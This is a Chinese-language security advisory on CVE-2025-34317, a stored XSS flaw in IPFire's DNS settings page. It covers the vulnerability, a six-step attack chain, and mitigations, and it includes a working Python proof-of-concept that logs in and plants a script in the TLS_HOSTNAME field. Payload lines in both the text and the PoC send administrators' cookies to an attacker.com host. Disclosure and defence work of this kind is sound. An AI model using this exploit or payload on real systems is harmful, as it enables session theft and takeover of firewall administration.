IPFire DNS设置存储型XSS漏洞 (CVE-2025-34317)

漏洞信息

漏洞编号

CVE-2025-34317

漏洞类型

存储型XSS

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

IPFire

漏洞概述

IPFire是一款开源的Linux防火墙发行版，广泛应用于企业网络边界防护场景。CVE-2025-34317是IPFire中一个严重的安全漏洞，存在于2.29版本之前（Core Update 198）的DNS配置功能中。该漏洞属于存储型跨站脚本（Stored XSS）类型，允许经过身份验证的低权限攻击者通过DNS设置页面的TLS_HOSTNAME参数注入任意JavaScript代码。由于注入的恶意脚本会被永久存储在系统数据库中，当其他管理员访问DNS配置页面时，恶意代码将自动执行，可能导致会话劫持、敏感信息窃取、管理员账户接管等严重后果。攻击者只需具备基本的用户账户权限即可实施攻击，但需要诱导其他管理员访问受感染的页面才能触发payload。此漏洞的存在严重威胁到IPFire防火墙的管理界面安全性，攻击者可能借此进一步渗透内网环境。

技术细节

该漏洞的根本原因在于IPFire的Web管理界面在处理DNS配置时未对用户输入进行充分的输入验证和输出编码。当管理员通过HTTP POST请求向/cgi-bin/dns.cgi端点提交DNS条目时，TLS_HOSTNAME参数的值被直接存储到后端数据库，而没有经过任何消毒处理。随后，当管理员访问DNS配置页面查看已保存的DNS条目时，这些未经过滤的数据被直接渲染到HTML页面中，导致嵌入其中的恶意JavaScript代码得以执行。攻击者可以利用此漏洞注入如下payload：<script>document.location='https://attacker.com/steal?cookie='+document.cookie</script>。由于该脚本被存储在服务器端，所有访问该DNS配置页面的用户都会成为受害者，攻击者可借此窃取会话令牌、伪造管理员操作或进一步探测内网环境。此漏洞的利用需要攻击者具备有效的用户凭证（低权限即可），并且需要诱使目标管理员访问受感染的页面（用户交互要求）。

攻击链分析

STEP 1

步骤1

攻击者获取IPFire系统的低权限用户账户（PR:L要求）

STEP 2

步骤2

攻击者登录IPFire Web管理界面，访问DNS配置页面（/cgi-bin/dns.cgi）

STEP 3

步骤3

攻击者构造包含恶意JavaScript代码的POST请求，在TLS_HOSTNAME参数中注入XSS payload

STEP 4

步骤4

服务器将未经过滤的TLS_HOSTNAME值存储到数据库中，实现持久化

STEP 5

步骤5

其他管理员访问DNS配置页面时，恶意脚本被浏览器执行（UI:R要求）

STEP 6

步骤6

攻击者通过恶意脚本窃取管理员会话cookie、执行未授权操作或进一步渗透内网

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys
from urllib.parse import quote

# CVE-2025-34317 PoC - IPFire Stored XSS via DNS settings
# Target: IPFire < 2.29 (Core Update 198)
# Endpoint: /cgi-bin/dns.cgi

TARGET_URL = "http://target-ipfire:444/cgi-bin/dns.cgi"
USERNAME = "admin"
PASSWORD = "password"

# XSS payload - steals session cookies
XSS_PAYLOAD = '<script>fetch("https://attacker.com/log?c="+document.cookie)</script>'

def exploit_stored_xss():
    """
    Exploit the stored XSS vulnerability in IPFire DNS settings.
    1. Authenticate to IPFire web interface
    2. Submit DNS entry with XSS payload in TLS_HOSTNAME parameter
    3. Payload is stored and executed when any admin views DNS config
    """
    session = requests.Session()
    
    # Step 1: Authentication
    auth_data = {
        'username': USERNAME,
        'password': PASSWORD
    }
    resp = session.post(f"{TARGET_URL.replace('/cgi-bin/dns.cgi', '/cgi-bin/auth.cgi')}", data=auth_data)
    
    if resp.status_code != 200:
        print("[-] Authentication failed")
        return False
    
    print("[+] Authentication successful")
    
    # Step 2: Inject XSS payload via DNS settings
    dns_data = {
        'ACTION': 'add',
        'DNS_NAME': 'malicious-dns',
        'DNS_IP': '8.8.8.8',
        'TLS_HOSTNAME': XSS_PAYLOAD,
        'SAVE': 'Add'
    }
    
    resp = session.post(TARGET_URL, data=dns_data)
    
    if resp.status_code == 200:
        print("[+] XSS payload injected successfully")
        print(f"[+] Payload stored in TLS_HOSTNAME field")
        print(f"[+] Any admin viewing DNS config will trigger: {XSS_PAYLOAD}")
        return True
    else:
        print("[-] Injection failed")
        return False

if __name__ == "__main__":
    exploit_stored_xss()

影响范围

IPFire < 2.29 (Core Update 198)

防御指南

临时缓解措施

在官方补丁发布之前，可采取以下临时缓解措施：1）限制Web管理界面的访问来源，仅允许受信任的IP地址访问/cgi-bin/dns.cgi端点；2）启用IPFire的入侵检测系统（IDS）监控异常请求；3）提醒管理员不要点击来源不明的链接访问管理界面；4）定期检查DNS配置页面是否存在可疑内容；5）考虑暂时禁用DNS功能或使用命令行方式管理DNS配置以避免Web界面暴露。